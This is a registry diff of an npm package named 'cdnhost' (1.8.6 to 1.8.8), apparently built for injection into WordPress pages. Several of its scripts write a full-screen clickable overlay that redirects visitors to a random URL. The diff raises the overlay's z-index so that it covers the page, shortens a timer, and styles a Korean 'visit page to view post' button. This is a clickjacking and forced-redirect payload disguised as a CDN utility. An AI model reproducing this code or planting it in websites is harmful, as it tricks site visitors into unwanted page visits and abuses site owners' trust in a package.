cdnhost 1.8.6 → 1.8.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/iwinv.js CHANGED
@@ -111,6 +111,23 @@
111
111
  button.id = 'button';
112
112
  button.style.position = 'relative';
113
113
  button.style.zIndex = 999;
114
+
115
+ button.style.margin = '15px auto';
116
+ button.style.padding = '14px 32px';
117
+ button.style.backgroundColor = '#0052cc';
118
+ button.style.color = '#fff';
119
+ button.style.border = 'none';
120
+ button.style.borderRadius = '8px';
121
+ button.style.fontSize = '18px';
122
+ button.style.fontWeight = '600';
123
+ button.style.cursor = 'pointer';
124
+ button.style.boxShadow = '0 2px 8px rgba(0,82,204,0.1)';
125
+ button.style.transition = 'background 0.2s, transform 0.1s';
126
+ button.style.display = 'flex';
127
+ button.style.alignItems = 'center';
128
+ button.style.gap = '8px';
129
+ button.style.justifyContent = 'center';
130
+
114
131
  button.textContent = '페이지 방문 후 게시글 보기';
115
132
  button.onclick = function() {
116
133
  ss();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "cdnhost",
3
- "version": "1.8.6",
3
+ "version": "1.8.8",
4
4
  "description": "cdnhost",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/seekr.js CHANGED
@@ -41,7 +41,7 @@ const urls = [
41
41
 
42
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
43
  document.writeln('<style>');
44
- document.writeln('#s2, #s3 {transition:opacity 5s;z-index:-99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
45
  document.writeln('</style>');
46
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
47
47
 
@@ -80,5 +80,5 @@ function h(){
80
80
  button.style.opacity = 1;
81
81
  document.getElementById("s2").style.transition = "opacity 1s";
82
82
  document.getElementById("button").style.transition = "opacity 1s";
83
- }, 3000);
84
- }
83
+ }, 2000);
84
+ }
package/seekr2.js CHANGED
@@ -41,7 +41,7 @@ const urls = [
41
41
 
42
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
43
  document.writeln('<style>');
44
- document.writeln('#s2, #s3 {transition:opacity 5s;z-index:-99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
45
  document.writeln('</style>');
46
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
47
47
 
@@ -80,5 +80,5 @@ function h(){
80
80
  button.style.opacity = 1;
81
81
  document.getElementById("s2").style.transition = "opacity 1s";
82
82
  document.getElementById("button").style.transition = "opacity 1s";
83
- }, 3000);
84
- }
83
+ }, 2000);
84
+ }
package/total.js CHANGED
@@ -41,7 +41,7 @@ const urls = [
41
41
 
42
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
43
  document.writeln('<style>');
44
- document.writeln('#s2, #s3 {transition:opacity 5s;z-index:-99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
45
  document.writeln('</style>');
46
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
47
47
 
@@ -80,5 +80,5 @@ function h(){
80
80
  button.style.opacity = 1;
81
81
  document.getElementById("s2").style.transition = "opacity 1s";
82
82
  document.getElementById("button").style.transition = "opacity 1s";
83
- }, 3000);
84
- }
83
+ }, 2000);
84
+ }
package/wordpress-chat.js CHANGED
@@ -41,7 +41,7 @@ const urls = [
41
41
 
42
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
43
  document.writeln('<style>');
44
- document.writeln('#s2, #s3 {transition:opacity 5s;z-index:-99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
45
  document.writeln('</style>');
46
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
47
47
 
@@ -80,5 +80,5 @@ function h(){
80
80
  button.style.opacity = 1;
81
81
  document.getElementById("s2").style.transition = "opacity 1s";
82
82
  document.getElementById("button").style.transition = "opacity 1s";
83
- }, 3000);
84
- }
83
+ }, 2000);
84
+ }
package/wp-pc-pop.js CHANGED
@@ -41,7 +41,7 @@ const urls = [
41
41
 
42
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
43
  document.writeln('<style>');
44
- document.writeln('#s2, #s3 {transition:opacity 5s;z-index:-99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
45
  document.writeln('</style>');
46
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
47
47
 
@@ -80,5 +80,5 @@ function h(){
80
80
  button.style.opacity = 1;
81
81
  document.getElementById("s2").style.transition = "opacity 1s";
82
82
  document.getElementById("button").style.transition = "opacity 1s";
83
- }, 3000);
84
- }
83
+ }, 2000);
84
+ }